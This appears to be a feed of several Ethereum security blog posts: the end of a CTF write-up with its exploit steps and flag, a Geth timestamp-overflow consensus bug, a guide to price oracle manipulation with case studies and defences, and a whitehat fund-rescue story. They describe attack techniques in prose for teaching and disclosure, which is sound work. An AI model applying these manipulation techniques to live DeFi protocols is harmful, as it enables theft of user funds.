Additionally, v.amountToMint is updated after the four iterations, meaning that even if we try to write directly to amounts[3], it'll just be overwritten with the correctly calculated value in the end. This means that we'll need to either make v.totalInNorm or v.totalSupply extremely big, or make v.totalBalanceNorm extremely small.

To do this, we first swap out all of the stablecoins in the AMM except for DAI. This means that v.totalBalanceNorm will not increase after the first iteration because the AMM has no balance. This just makes our lives a bit easier later on.

Next, we'll purchase the right amount of DAI/TUSD/USDC such that when amounts[i] = v.has is executed, we'll write our desired values into v. The balance of DAI will be written to v.totalSupply, so we'll want to set this to a large number such as 10000e18. The balance of TUSD will be written to v.totalBalanceNorm, so we'll update that to 1. Finally, the balance of USDC will be written to v.totalInNorm so we'll also set that to 10000e18. There's no point manipulating the USDT balance because the value will be clobbered anyways.

Finally, we just need to assemble our payload and send the transaction, giving us the flag we worked so hard for: PCTF{hon3y_1_Ov3rFLOw3d_7h3_M3MOry}.

You can find the official solution here.

Conclusion

This was by far the most complex challenge in the CTF and for good reason - it made use of a vulnerability that most people haven't heard of and very few people actively think about. It also challenged basic assumptions about what Solidity source code really does. However, I think it made for a great exercise in solving problems from first principles, eliminating assumptions, and exploring the entire search space. Hopefully you enjoyed this writeup and I'll see you next year at Paradigm CTF 2022!

]]>
<![CDATA[The Block Mined In January, 584942419325]]>https://samczsun.com/the-block-mined-in-january-584942419325/605d68558b092400019e9ed2Tue, 30 Mar 2021 15:01:31 GMT

This is the first in a series of blog posts about the bugs I've found in go-ethereum (Geth), the official Golang implementation of the Ethereum protocol. While you don't need a deep understanding of Geth in order to follow these blog posts, knowledge of how Ethereum itself works will be helpful.

This first post is about a bug in Geth's uncle validation routine which did not behave correctly given a specially crafted uncle. If exploited, this could have caused an accidental fork between Geth and Parity nodes.

Blocks and Uncles

Every blockchain has a canonical chain, which is defined through some metric like the total length of the chain or the amount of work required to produce the total chain. However, network latency means that sometimes two blocks can be produced at the same time. Only one block can be included in the canonical chain, so the other block must be left out.

Some blockchains such as Bitcoin will completely ignore these blocks, rendering them orphaned from the canonical chain. Other blockchains such as Ethereum will still reward miners who put in the effort but rolled a nat 1 on block propagation. In Ethereum, these orphaned blocks that still get included are known as uncles.

An uncle needs to satisfy certain conditions in order to be considered valid. First, all of the block's properties must be valid according to normal consensus rules, and second, an uncle block must be the child of a block at most 6 blocks away from the current head of the chain. However, one exception applies: while normal blocks must not be more than 15 seconds in the future, an uncle block is not restricted in this way.

A Brief Interlude on Integers

Most programming languages have the concept of platform-dependent integers and fixed-width integers. Platform-dependent integers may be 32 bits or 64 bits (or something else!) depending on the platform that the program was compiled on. In C/C++ and Go you might use uint while in Rust you might use usize.

However, sometimes the programmer might want to guarantee that their variable can hold 64 bits of data, even if the platform is 32-bit. In these cases, the programmer can use a fixed-width integer type. In C/C++ that would be uint64_t, in Go uint64, and in Rust u64.

The benefit of these built-in integer types is that they're all first-class citizens and thus are very simple to use. Consider this implementation of the Collatz Conjecture which supports 64-bit integers.

func collatz(n uint64) uint64 {
    if n % 2 == 0 {
    	return n / 2
    } else {
    	return 3 * n + 1
    }
}

However, this implementation has a slight flaw, it doesn't support inputs which are larger than 64 bits. For that, we'll need big integers. Most languages support this either within the standard library itself such as big.Int in Go, or through external libraries for C/C++ or Rust.

Unfortunately, using big integers has a big downside: they're much clunkier to use. This is illustrated in the reimplementation of the Collatz Conjecture, but supporting arbitrarily large integers.

var big0 = big.NewInt(0)
var big1 = big.NewInt(1)
var big2 = big.NewInt(2)
var big3 = big.NewInt(3)

func collatzBig(n *big.Int) *big.Int {
	if new(big.Int).Mod(n, big2).Cmp(big0) == 0 {
		return new(big.Int).Div(n, big2)
	} else {
		v := new(big.Int).Mul(big3, n)
		v.Add(v, big1)
		return v
	}
}

Clearly, the 64-bit version is much simpler to write and read, and so it's no surprise that programmers like to use simple integer types when possible.

Expectation vs Reality

In Ethereum, most data is expected to fit within 256 bits, although some fields are only expected to be an integer value with no limit on size. Notably, the block timestamp Hs is defined to be a 256-bit integer.

The Block Mined In January, 584942419325
Ethereum Yellow Paper, page 6

The Geth team attempted to be faithful to this definition by validating that the timestamp on an uncle block was not larger than 2256-1. Recall that uncles have no restrictions on future mining.

// Verify the header's timestamp
if uncle {
    if header.Time.Cmp(math.MaxBig256) > 0 {
        return errLargeBlockTime
    }
} else {
    if header.Time.Cmp(big.NewInt(time.Now().Add(allowedFutureBlockTime).Unix())) > 0 {
        return consensus.ErrFutureBlock
    }
}
Source

Unfortunately, the code then immediately coerced the block timestamp into a 64-bit integer in order to calculate the correct difficulty for the block.

// Verify the block's difficulty based in it's timestamp and parent's difficulty
expected := ethash.CalcDifficulty(chain, header.Time.Uint64(), parent)
Source

This would not be so bad if Parity behaved in the same way, but Parity would saturate the timestamp at 264-1 instead of overflowing.

let mut blockheader = Header {
    parent_hash: r.val_at(0)?,
    uncles_hash: r.val_at(1)?,
    author: r.val_at(2)?,
    state_root: r.val_at(3)?,
    transactions_root: r.val_at(4)?,
    receipts_root: r.val_at(5)?,
    log_bloom: r.val_at(6)?,
    difficulty: r.val_at(7)?,
    number: r.val_at(8)?,
    gas_limit: r.val_at(9)?,
    gas_used: r.val_at(10)?,
    timestamp: cmp::min(r.val_at::<U256>(11)?, u64::max_value().into()).as_u64(),
    extra_data: r.val_at(12)?,
    seal: vec![],
    hash: keccak(r.as_raw()).into(),
};
Source

This means that if a malicious miner included an uncle with a block timestamp of 584942419325-01-27 07:00:16 UTC, or unix time 264, then Geth would calculate the difficulty using unix time 0 while Parity would calculate the difficulty using unix time 264-1. These two values would be different, so one of the two clients would have split from the canonical chain after failing to verify the block.

The Geth team fixed this bug in PR 19372, which switched all timestamps to use uint64.

Conclusion

Every client participating in a consensus protocol must behave exactly identically, so what may seem like a completely benign operation might actually be the trigger which causes half of the network to disconnect. This also goes to show that you don't need to be highly technical in order to find impactful bugs, so if this seems like something you'd be interested in, there's no better way to get started than to dive right in.

Next time, we'll be exploring how Geth stores the data that makes up Ethereum, and how a skilled attacker could have planted a ticking time bomb that would hard fork the chain when detonated.

]]>
<![CDATA[So you want to use a price oracle]]>https://samczsun.com/so-you-want-to-use-a-price-oracle/5fa974f6c9ce5800018a69aeMon, 09 Nov 2020 19:56:37 GMT

In late 2019, I published a post titled “Taking undercollateralized loans for fun and for profit”. In it, I described an economic attack on Ethereum dApps that rely on accurate price data for one or more tokens. It's currently late 2020 and unfortunately numerous projects have since made very similar mistakes, with the most recent example being the Harvest Finance hack which resulted in a collective loss of 33MM USD for protocol users.

While developers are familiar with vulnerabilities like reentrancy, price oracle manipulation is clearly not something that is often considered. Conversely, exploits based on reentrancy have fallen over the years while exploits based on price oracle manipulation are now on the rise. As such, I decided it was time that someone published a definitive resource on price oracle manipulation.

This post is broken down into three sections. For those who are unfamiliar with the subject, there is an introduction to oracles and oracle manipulation. Those who want to test their knowledge may skip ahead to the case studies, where we review past oracle-related vulnerabilities and exploits. Finally, we wrap up with some techniques developers can apply to protect their projects from price oracle manipulation.

Oracle manipulation in real life

Wednesday, December 1st, 2015. Your name is David Spargo and you’re at the Peking Duk concert in Melbourne, Australia. You’d like to meet the band in person but between you and backstage access stand two security guards, and there’s no way they would let some average Joe walk right in.

How would the security guards react, you wonder, if you simply acted like you belonged. Family members would surely be allowed to visit the band backstage, so all you had to do was convince the security guards that you were a relative. You think about it for a bit and come up with a plan that can only be described as genius or absolutely bonkers.

After quickly setting everything up, you confidently walk up to the security guards. You introduce yourself as David Spargo, family of Peking Duk. When the guard asks for proof, you show them the irrefutable evidence - Wikipedia.

So you want to use a price oracle

The guard waves you through and asks you to wait. A minute passes, then two. After five minutes, you wonder if you should make a run for it before law enforcement makes an appearance. As you’re about to bail, Reuben Styles walks up and introduces himself. You walk with him to the green room where the band was so impressed with your ingenuity that you end up sharing a few beers together. Later, they share what happened on their Facebook page.

So you want to use a price oracle

What is a price oracle?

A price oracle, generously speaking, is anything that you consult for price information. When Pam asks Dwight for the cash value of a Schrute Buck, Dwight is acting as a price oracle.

So you want to use a price oracle

On Ethereum, where everything is a smart contract, so too are price oracles. As such, it’s more useful to distinguish between how the price oracle gets its price information. In one approach, you can simply take the existing off-chain price data from price APIs or exchanges and bring it on-chain. In the other, you can calculate the instantaneous price by consulting on-chain decentralized exchanges.

So you want to use a price oracle

Both options have their respective advantages and disadvantages. Off-chain data is generally slower to react to volatility, which may be good or bad depending on what you’re trying to use it for. It typically requires a handful of privileged users to push the data on-chain though, so you have to trust that they won’t turn evil and can’t be coerced into pushing bad updates. On-chain data doesn’t require any privileged access and is always up-to-date, but this means that it’s easily manipulated by attackers which can lead to catastrophic failures.

What could possibly go wrong?

Let’s take a look at a few cases where a poorly integrated price oracle resulted in significant financial damage to a DeFi project.

Synthetix sKRW Oracle Malfunction

Synthetix is a derivatives platform which allows users to be exposed to assets such as other currencies. To facilitate this, Synthetix (at the time) relied on a custom off-chain price feed implementation wherein an aggregate price calculated from a secret set of price feeds was posted on-chain at a fixed interval. These prices then allowed users to take long or short positions against supported assets.

On June 25, 2019, one of the price feeds that Synthetix relied on mis-reported the price of the Korean Won to be 1000x higher than the true rate. Due to additional errors elsewhere in the price oracle system, this price was accepted by the system and posted on-chain, where a trading bot quickly traded in and out of the sKRW market.

So you want to use a price oracle

In total, the bot was able to earn a profit of over 1B USD, although the Synthetix team was able to negotiate with the trader to return the funds in exchange for a bug bounty.

Synthetix correctly implemented the oracle contract and pulled prices from multiple sources in order to prevent traders from predicting price changes before they were published on-chain. However, an isolated case of one upstream price feed malfunctioning resulted in a devastating attack. This illustrates the risk of using a price oracle which uses off-chain data: you don't know how the price is calculated, so your system must be carefully designed such that all potential failure modes are handled properly.

Undercollateralized Loans

As mentioned earlier, I published a post in September 2019 outlining the risks associated with using price oracles that relied on on-chain data. While I highly recommend reading the original post, it is quite long and heavy in technical details which may make it hard to digest. Therefore, I’ll be providing a simplified explanation here.

Imagine you wanted to bring decentralized lending to the blockchain. Users are allowed to deposit assets as collateral and borrow other assets up to a certain amount determined by the value of the assets they’ve deposited. Let’s assume that a user wants to borrow USD using ETH as collateral, that the current price of ETH is 400 USD, and that the collateralization ratio is 150%.

If the user deposits 375 ETH, they’ll have deposited 150,000 USD of collateral. They can borrow 1 USD for every 1.5 USD of collateral, so they’ll be able to borrow a maximum 100,000 USD from the system.

So you want to use a price oracle

But of course, on the blockchain it’s not as simple as simply declaring that 1 ETH is worth 400 USD because a malicious user could simply declare that 1 ETH is worth 1,000 USD and then take all the money from the system. As such, it’s tempting for developers to reach for the nearest price oracle shaped interface, such as the current spot price on Uniswap, Kyber, or another decentralized exchange.

So you want to use a price oracle

At first glance, this appears to be the correct thing to do. After all, Uniswap prices are always roughly correct whenever you want to buy or sell ETH as any deviations are quickly correct by arbitrageurs. However, as it turns out, the spot price on a decentralized exchange may be wildly incorrect during a transaction as shown in the example below.

Consider how a Uniswap reserve functions. The price is calculated based on the amount of assets held by the reserve, but the assets held by the reserve changes as users trade between ETH and USD. What if a malicious user performs a trade before and after taking a loan from your platform?

Before the user takes out a loan, they buy 5,000 ETH for 2,000,000 USD. The Uniswap exchange now calculates the price to be 1 ETH = 1,733.33 USD. Now, their 375 ETH can act as collateral for up to 433,333.33 USD worth of assets, which they borrow. Finally, they trade back the 5,000 ETH for their original 2,000,000 USD, which resets the price. The net result is that your loan platform just allowed the user to borrow an additional 333,333.33 USD without putting up any collateral.

So you want to use a price oracle

This case study illustrates the most common mistake when using a decentralized exchange as a price oracle - an attacker has almost full control over the price during a transaction and trying to read that price accurately is like reading the weight on a scale before it’s finished settling. You’ll probably get the wrong number and depending on the situation it might cost you a lot of money.

Synthetix MKR Manipulation

In December 2019, Synthetix suffered another attack as a result of price oracle manipulation. What’s notable about this one is that it crossed the barrier between on-chain price data and off-chain price data.

Reddit user u/MusaTheRedGuard observed that an attacker was making some very suspicious trades against sMKR and iMKR (inverse MKR). The attacker first purchased a long position on MKR by buying sMKR, then purchased large quantities of MKR from the Uniswap ETH/MKR pair. After waiting a while, the attacker sold their sMKR for iMKR and sold their MKR back to Uniswap. They then repeated this process.

Behind the scenes, the attacker’s trades through Uniswap allowed them to move the price of MKR on Synthetix at will. This was likely because the off-chain price feed that Synthetix relied on was in fact relying on the on-chain price of MKR, and there wasn’t enough liquidity for arbitrageurs to reset the market back to optimal conditions.

So you want to use a price oracle

This incident illustrates the fact that even if you think you’re using off-chain price data, you may still actually be using on-chain price data and you may still be exposed to the intricacies involved with using that data.

The bZx Hack

In February 2020, bZx was hacked twice over the span of several days for approximately 1MM USD. You can find an excellent technical analysis of both hacks written by palkeo here, but we will only be looking at the second hack.

In the second hack, the attacker first purchased nearly all of the sUSD on Kyber using ETH. Then, the attacker purchased a second batch of sUSD from Synthetix itself and deposited it on bZx. Using the sUSD as collateral, the attacker borrowed the maximum amount of ETH they were allowed to. They then sold back the sUSD to Kyber.

If you’ve been paying attention, you’ll recognize this as essentially the same undercollateralized loan attack, but using a different collateral and a different decentralized exchange.

yVault Bug

On July 25, 2020, I reported a bug to yEarn regarding the launch of their new yVault contracts. You can read the official writeup about this bug here, but I will briefly summarize it below.

The yVault system allows users to deposit a token and earn yield on it without needing to manage it themselves. Internally, the vault tracks the total amount of yVault tokens minted as well as the total amount of underlying tokens deposited. The worth of a single yVault token is given by the ratio of tokens minted to tokens deposited. Any yield the vault earns is spread across all minted yVault tokens (and therefore, across all yVault token holders).

The first yVault allowed users to earn yield on USDC by supplying liquidity to the Balancer MUSD/USDC pool. When a user supplies liquidity to Balancer pools, they receive BPT in return which can be redeemed for a proportion of the pool. As such, the yVault calculated the value of its holdings based on the amount of MUSD/USDC which could be redeemed with its BPT.

This seems like the correct implementation, but unfortunately the same principle as given before applies - the state of the Balancer pool during a transaction is not stable and cannot be trusted. In this case, because of the bonding curve that Balancer chose, a user who swaps between from USDC to MUSD will not receive a 1:1 exchange rate, but will in fact leave behind some MUSD in the pool. This means that the value of BPT can be temporarily inflated, which allows an attacker to manipulate the price at will and subsequently drain the vault.

So you want to use a price oracle

This incident shows that price oracles are not always conveniently labelled as such, and that developers need to be vigilant about what sort of data they’re ingesting and consider whether that data can be easily manipulated by an unprivileged user.

Harvest Finance Hack

On October 26, 2020, an unknown user hacked the Harvest Finance pools using a technique that you can probably guess by now. You can read the official post-mortem here, but once again I’ll summarize it for you: the attacker deflated the price of USDC in the Curve pool by performing a trade, entered the Harvest pool at the reduced price, restored the price by reversing the earlier trade, and exited the Harvest pool at a higher price. This resulted in over 33MM USD of losses.

How do I protect myself?

By now, I hope that you’ve learned to recognize the common thread - it's not always obvious that you're using a price oracle and if you don't follow the proper precautions, an attacker could trick your protocol into sending them all of your money. While there’s no one-size-fits-all fix that can be prescribed, here are a few solutions that have worked for other projects in the past. Maybe one of them will apply to you too.

Shallow Markets, No Diving

Like diving into the shallow end of a pool, diving into a shallow market is painful and might result in significant expenses which will change your life forever. Before you even consider the intricacies of the specific price oracle you’re planning to use, consider whether the token is liquid enough to warrant integration with your platform.

A Bird in the Hand is Worth Two in the Bush

It may be mesmerizing to see the potential exchange rate on Uniswap, but nothing’s final until you actually click trade and the tokens are sitting in your wallet. Similarly, the best way to know for sure the exchange rate between two assets is to simply swap the assets directly. This approach is great because there’s no take-backs and no what-ifs. However, it may not work for protocols such as lending platforms which are required to hold on to the original asset.

Almost Decentralized Oracles

One way to summarize the problem with oracles that rely on on-chain data is that they’re a little too up-to-date. If that’s the case, why not introduce a bit of artificial delay? Write a contract which updates itself with the latest price from a decentralized exchange like Uniswap, but only when requested by a small group of privileged users. Now even if an attacker can manipulate the price, they can’t get your protocol to actually use it.

This approach is really simple to implement and is a quick win, but there are a few drawbacks - in times of chain congestion you might not be able to update the price as quickly as you’d like, and you’re still vulnerable to sandwich attacks. Also, now your users need to trust that you’ll actually keep the price updated.

Speed Bumps

Manipulating price oracles is a time-sensitive operation because arbitrageurs are always watching and would love the opportunity to optimize any suboptimal markets. If an attacker wants to minimize risk, they’ll want to do the two trades required to manipulate a price oracle in a single transaction so there’s no chance that an arbitrageur can jump in the middle. As a protocol developer, if your system supports it, it may be enough to simply implement a delay of as short as 1 block between a user entering and exiting your system.

Of course, this might impact composability and miner collaboration with traders is on the rise. In the future, it may be possible for bad actors to perform price oracle manipulation across multiple transactions knowing that the miner they’ve partnered with will guarantee that no one can jump in the middle and take a bite out of their earnings.

Time-Weighted Average Price (TWAP)

Uniswap V2 introduced a TWAP oracle for on-chain developers to use. The documentation goes into more detail on the exact security guarantees that the oracle provides, but in general for large pools over a long period of time with no chain congestion, the TWAP oracle is highly resistant to oracle manipulation attacks. However, due to the nature of its implementation, it may not respond quickly enough to moments of high market volatility and only works for assets for which there is already a liquid token on-chain.

M-of-N Reporters

Sometimes they say that if you want something done right, you do it yourself. What if you gather up N trusted friends and ask them to submit what they think is the right price on-chain, and the best M answers becomes the current price?

This approach is used by many large projects today: Maker runs a set of price feeds operated by trusted entities, Compound created the Open Oracle and features reporters such as Coinbase, and Chainlink aggregates price data from Chainlink operators and exposes it on-chain. Just keep in mind that if you choose to use one of these solutions, you’ve now delegated trust to a third party and your users will have to do the same. Requiring reporters to manually post updates on-chain also means that during times of high market volatility and chain congestion, price updates may not arrive on time.

Conclusion

Price oracles are a critical, but often overlooked, component of DeFi security. Safely using price oracles is hard and there’s plenty of ways to shoot both yourself and your users in the foot. In this post, we covered past examples of price oracle manipulation and established that reading price information during the middle of a transaction may be unsafe and could result in catastrophic financial damage. We also discussed a few techniques other projects have used to combat price oracle manipulation in the past. In the end though, every situation is unique and you might find yourself unsure whether you’re using a price oracle correctly. If this is the case, feel free to reach out for advice!

Special thanks to Dan Robinson and Georgios Konstantopoulos for reviewing this post, and to @zdhu_ and mongolsteppe for pointing out an error.

]]>
<![CDATA[Changing Lanes]]>https://samczsun.com/changing-lanes/5f7cfdfac9ce5800018a6968Fri, 09 Oct 2020 15:19:06 GMT

In early 2020, I was given an opportunity to join Trail of Bits over the summer. I was familiar with the high quality of work that they produced so I happily accepted the opportunity to meet and work with some of the brightest minds in software security.

During my time at Trail of Bits I worked on numerous engagements with coworkers who were experts in all sorts of subjects, from cryptography to binary analysis to formal verification. It was a truly great experience to be able to collaborate with and learn from so many talented individuals.

When I wasn’t helping clients secure their software, I spent time improving Slither, a static code analyzer for Solidity, alongside Josselin Feist. Although program analysis isn’t my strong suit, I was able to improve quickly thanks to Josselin’s mentorship and I’m proud to have been able to contribute back by implementing support for inline assembly as well as identifying and fixing a handful of internal bugs.

However, as summer drew to a close, I began considering what I wanted to do next. At the same time, Matt Huang from Paradigm reached out with an offer to meet the team. Not knowing much about Paradigm beyond the fact that two people I respected, Dan Robinson and Georgios Konstantopoulos, worked there, I figured it couldn’t hurt to chat.

After talking with Matt, Fred Ehrsam, Alana Palmedo, Gus Coldebella, and the others on the team, I realized that Paradigm had amassed a group of extremely talented people, each a leader in their respective fields. The thought of being able to work alongside them and learn from their experiences was extremely exciting.

As such, I’m happy to share that I’m joining Paradigm as a Research Partner. My responsibilities will include helping evaluate the security posture of potential portfolio companies, assisting current portfolio companies, advancing the overall security of the Ethereum ecosystem, but most importantly, learning new things.

I’d like to thank Dan Guido and everyone at Trail of Bits for having me this summer as well as Matt Huang and everyone at Paradigm for bringing me on board. I’d also like to thank the community for your continued support. I wouldn’t be here without you, and I hope you’ll join me in facing whatever the future holds.

]]>
<![CDATA[Escaping the Dark Forest]]>https://samczsun.com/escaping-the-dark-forest/5f6c30088fb3100001de1691Thu, 24 Sep 2020 16:29:39 GMT

I was about to wrap up for the night when I decided to take another look at some smart contracts.

I wasn’t expecting anything interesting, of course. Over the past few weeks I had seen countless yield farming clones launch with the exact same pitch: stake your tokens with us and you could be the next cryptocurrency millionaire. Most were simply forks of well-audited code although some tweaked bits and pieces, sometimes with catastrophic results.

But amidst all of the noise there was some code I hadn’t seen before. The contract held over 25,000 Ether, worth over 9,600,000 USD at the time, and would be a very juicy payday for anyone who managed to find a bug in its logic.

I quickly looked through the code for where Ether is transferred out and found two hits. One of them transferred the Ether to a hardcoded token address, so that could be ignored. The second was a burn function that transferred Ether to the sender. After tracing the usage of this function, I discovered that it would be trivial for anyone to mint tokens to themselves for free, but then burn them in exchange for all of the Ether in the contract. My heart jumped. Suddenly, things had become serious.

Some digging revealed that the contract I had found was part of Lien Finance’s protocol. Unfortunately, their team was anonymous! The only IM platform they supported was Telegram, and I couldn’t be sure that the admins of that channel were actually protocol developers or just a few early supporters. The last thing I wanted to do was accidentally leak the exploit to the wrong person.

After browsing their website a little while longer, I noticed that they had worked with ConsenSys Diligence and CertiK for an audit. This seemed like a good avenue, since both ConsenSys and CertiK must have interacted with the developers during their audits. I quickly pinged maurelian on Telegram.

Escaping the Dark Forest
You never want to be on the receiving end of this message

Unfortunately, time ticked on, my heart kept pounding, but there was no response from maurelian. It seemed like he had already gone to sleep. Desperate, I sent a message to the ETHSecurity Telegram channel.

Escaping the Dark Forest
Artist's rendering of the message, since I deleted the original

Within minutes, I got a message from someone I’d worked with quite a few times in the past - Alex Wade.


My head had just hit the pillow when I got a knock on my door. It was my roommate: “Sam’s in the ETHSec Telegram asking for anyone from Diligence.”

Escaping the Dark Forest
It was, in fact, a long night

Knowing Sam, this couldn’t be good. I found a channel we’d set up with Lien a few months ago and an email address. Better than nothing, given their team was anon.

I was still half asleep. Sam, not wanting to commit details to text, asked for a Zoom call. Groggily wishing I was back in bed, I attempted to gauge the severity of the situation:

Escaping the Dark Forest
Five minutes later, it was clear that the situation called for coffee

Sam and I reviewed the code together. By this point, Sam had already prepared a sample exploit and was able to confirm the issue on his machine. The conversation quickly turned to discussing options:

  1. Attempt to exploit the issue ourselves.
  2. Reach out to Lien and have them go public, urging users to withdraw.

Neither of these were appealing options. The first was risky because, as discussed in Ethereum is a Dark Forest by Dan Robinson and Georgios Konstantopoulos, the possibility of our transactions getting frontrun was very real. The second option was similarly risky, as a public announcement would draw attention to the problem and create a window of opportunity for attackers. We needed a third option.

Recalling a section from Ethereum is a Dark Forest, Sam reached out to Scott Bigelow:

If you find yourself in a situation like this, we suggest you reach out to Scott Bigelow, a security researcher who has been studying this topic and has a prototype implementation for a better obfuscator.

After participating in the recovery attempt from Ethereum is a Dark Forest, which ultimately lost to front-runners, I was hungry for a re-match. I’ve spent time monitoring front-running and designing a simple system that seemed able to fool generalized front-runners, at least for the $200 I’d been able to test it with. When Sam reached out to me in the late evening with the innocent-sounding “mind staying up for another hour or so”, I couldn’t wait to try it out! I was already working it out: how I’d make a few tweaks, stay up a couple hours, feel a sense of accomplishment having helped rescue and return a few thousand dollars of user funds, and get a good night’s sleep.

Those plans immediately fell apart when Sam shared the contract with me: ~25,000 ETH, valued at $9.6M, at stake. For as much as I wanted that rematch, $9.6M was way outside my humble script’s weight class.


For the past few months, I had been trying to establish contacts with miners for this very purpose: white-hat transaction cooperation. If ever there was a time to appeal to a miner to include a transaction without giving front-runners the chance to steal it, it was now. Luckily, Tina and I have worked together over the past few months on establishing this cooperation. It seemed like a slim chance at the time, but it was worth a shot: let’s bring Tina into the rescue attempt to work with a mining pool to mine a private transaction.


I had just evacuated from the Bobcat forest fire and was sipping on unknown beachy drinks zoning out to the monotonic sound of dark Pacific waves, when a Telegram DM from Sam buzzed me back to a darker reality: “funds at risk, frontrunnable”. Over the last few weeks, I had been collaborating with Sam and Scott on a research project on MEV and could already guess their ask before they sent it: a direct channel to shield a whitehat tx from getting sniped by the “advanced predators” in the mempool’s “dark forest”.

Since this was a risky move that entailed exposing our strategy to miners, we decided we should first try to get the greenlight from the anonymous Lien team. While Alex was trying to get in contact via ConsenSys-internal channels, we tried to loop in CertiK as well.

I realized it may take another 4 hours before Certik's US-based auditors would wake up, yet the clock was ticking.  Knowing nothing much about CertiK beyond the fact it had serviced quite a few Asian projects, I tried to reach the CertiK China team to arbitrage the time zone difference. I blasted a casual sounding message in “DeFi the World” and “Yellow Hats” WeChat groups. Four leads slid into my DMs independently within 30 minutes, confirming the WeChat ID that I connected with was indeed the real Zhaozhong Ni, CTO of CertiK. I was added to a WeChat group with 5 CertiK team members, yet at this point I was still not in a position to disclose the project nor the vulnerability. To minimize the exposure and potential liability, we could only invite one member from Certik to join our whitehat operation. After passing a final verification via official email, Georgios Delkos, the engineering lead at CertiK joined our call.

With Georgios’s help, Alex was able to quickly get in contact with the Lien team and verify their identity. We brought them up-to-speed on the current situation and asked for their permission to try working directly with a mining pool to rescue the vulnerable funds. After some deliberation, the Lien team agreed that the risk from trying to rescue the funds directly or publishing a warning was too high, and gave the go-ahead to continue.

Now we needed to identify a mining pool that had the infrastructure ready in place and would be willing to cooperate with us ASAP. Which mining pool should we tap? Which contact from the pool would be in a position to make technical decisions swiftly that help us beat the clock?

SparkPool came to mind, as I knew they had been working on a piece of public infrastructure called Taichi Network that could easily offer what we needed. I decided to ping Shaoping Zhang, SparkPool’s co-founder, who had helped me investigate mempool events in the past.

Half an hour later, Shaoping responded: “You mean do we have a whitelist service for transactions? Sorry, we don’t.” Oops, something was lost in translation, “whitehat” and “whitelist” sounded similar in Chinese.

“There’s 10mn dollar worth of funds at risk. samczsun is on the line.” I tried again to communicate the situation without revealing any specifics.

Escaping the Dark Forest

“Are you guys saving the world again? Do you need help from our mining pool?” To my surprise and great relief, Shaoping jokingly extended an offer to help. After official email verification, Shaoping popped into our marathon Zoom call with the support of a roomful of SparkPool devs.


After lunch, just when I was about to take a nap, I received a message from Tina: “Has SparkPool ever helped with whitehat transactions??” I mistook it for whitelisting a transaction at first. No whitehats had approached us before, and we were not familiar with what “whitehat transactions” entailed. After Tina explained it in more details, I realized that what they needed was a private transaction service, i.e. the whitehats wanted to send transactions to save a DeFi contract, but in order to prevent getting front-runned, they needed a mining pool to include the transaction without broadcasting it.

We had been working on a “private transaction” feature on our Taichi Network, which was still under development and had not been tested. I brought the whitehats’ request to our development team, and explained the urgency: our private transaction feature needed to be in production within a few hours. Our devs said they could try their best to finish in time, and we immediately got to work. We finished development of the private transaction feature in 2 hours, and then spent some time fixing bugs.

After we completed our internal testing, we sent the whitehat.taichi.network endpoint to Scott Bigelow to deliver the whitehat payload.


While SparkPool was working to deliver this brand new whitehat API, Sam and I were finishing the script to generate 4 sequential signed transactions. Processing these transactions in order would not withdraw the ~25,000 ETH itself, but would transfer 30,000 SBT+LBT tokens (which were “falsely” created) to the Lien team, allowing them to submit the final transaction to convert these tokens back into ETH. By transferring the infinitely mintable SBT+LBT tokens to Lien instead of ETH, we used more transactions to obscure how the attack worked from generalized front-runners (in case of a re-org), and I was able to avoid incurring $9.6M of income, even if for a moment.

Once we had generated 4 signed transactions, Sam and I spent a long time verifying their combinated behavior using a variety of multi-call transaction simulation tools. These 4 transactions, less than 1.5KB of data in total, were ready to heist $9.6M of assets, so long as no-one but SparkPool sees them until it is too late.

I tested SparkPool’s whitehat endpoint with a meaningless transaction, and it worked exactly as expected: the transaction was not seen in the mempool, then suddenly appeared as part of a SparkPool block! It was like watching water vapor turn directly into ice without that pesky liquid phase.

After adapting the transaction-creation script to feed the transactions directly to SparkPool’s new endpoint, it was time. I hesitated for a moment, but this was absolutely our best effort. We might lose $9.6M, but there would be no regrets: I hit “run” in IntelliJ. I’m not sure why, but I expected it to take a while, like node would understand the gravity of the situation and take its time. It did not; the transactions were sent in a matter of milliseconds.

Everyone on the call began refreshing Etherscan with such vigor, I wondered if the Etherscan team would see a 3-minute spike in traffic. Since only SparkPool had the transactions, and only a portion of SparkPool’s hash rate was dedicated to this purpose, there was nothing to do but sweat and wait. Each block that appeared from another miner mocked us. Someone on the call would announce the miner to nervous chuckles. The ~15 blocks it took before our transactions were included felt like hours, but finally, we had our immaculate transactions: mined, in order, not reverted.

We watched with relief as more and more blocks were built on top of ours and our concerns about block re-orgs quickly faded. The Lien team was now in possession of enough SBT+LBT tokens to liquidate their entire system, and Sam went to coordinate the final phase of the rescue.


Now that we had successfully transferred the tokens to Lien and there was no sign of any frontrunning, attempted or otherwise, we quickly pinged them with the good news. They confirmed that they received the tokens and immediately sent out a transaction to withdraw the bulk of the ether stored in the contract. Seconds later, a pending transaction appeared on Etherscan.

As we watched the loading indicator spin, I took the opportunity to reflect upon the events that lead to this moment. What had started as a quick glance at some contracts ended up turning into full-blown warroom that pulled in experts from around the world. Without Alex and Georgios, we wouldn’t have been able to make contact with the Lien developer. Without Scott, we would’ve been going into a rescue blind. Without Tina, we wouldn’t have been able to get in contact with CertiK or SparkPool. Without SparkPool, we would’ve been doomed to repeat the history that Dan had written about just weeks ago.

And yet on a late Tuesday night, our unlikely group united under a common cause and worked tirelessly to try and ensure that over 9.6 million dollars would be returned to their rightful owners. All of our efforts over the last 7 hours led to this single pending transaction and the spinning dots that came with it.

When the loading indicator finally turned into a green checkmark, the tense silence on the call gave way to a collective sigh of relief.

Escaping the Dark Forest
[1]

We had escaped the dark forest.


This post was the culmination of the hard work of many people. Special thanks to Alex Wade, Scott Bigelow, Tina Zhen, Georgios Delkos, and SparkPool for being there when the ecosystem needed you most, as well as Alex Obadia and Dan Robinson for reviewing this post and providing feedback.

If you’re interested in the technical details behind the exploit, click here to learn more. If for some reason you still haven’t read Ethereum is a Dark Forest, you should definitely do so too.

[1] The transaction

]]>
<![CDATA[Authereum, meet Parity]]>https://samczsun.com/authereum-meet-parity/5e4b1e97f66f5500017aee56Wed, 19 Feb 2020 03:54:32 GMTtl;dr

The Authereum wallet contained a bug which would allow an attacker to take over any wallet at any time. The Authereum team exploited this bug in order to force an upgrade on all user wallets, and as a result no funds were lost.

Authereum

Authereum is a project which aims to make using Ethereum dApps easier for everyday users. In order to achieve this goal, they've built a set of smart contracts which act as a smart wallet.

Each smart wallet is owned by a set of admin keys, and the first admin key is generated when a user creates their account on Authereum. Naturally, an admin key can add a new admin key.

